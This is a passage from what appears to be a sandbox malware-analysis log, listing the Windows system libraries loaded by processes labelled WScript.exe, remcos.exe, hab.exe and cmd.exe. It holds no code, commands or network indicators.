api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\WScript.exe (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\advapi32.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003000)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003000)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003276)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003276)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003276)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00003276)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00003276)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00003276)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00003276)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00003276)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003276)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00003276)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00003276)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00003276)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00001464)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00001464)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter GDI32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter MSVCP60.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WINMM.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WININET.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter User32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter Psapi.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003528)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\WScript.exe (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\advapi32.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00000956)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00000956)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002108)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002108)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002108)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002108)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004516)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00003188)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter GDI32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter MSVCP60.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WINMM.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WININET.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter User32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter Psapi.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003748)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003748)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\WScript.exe (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\advapi32.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter 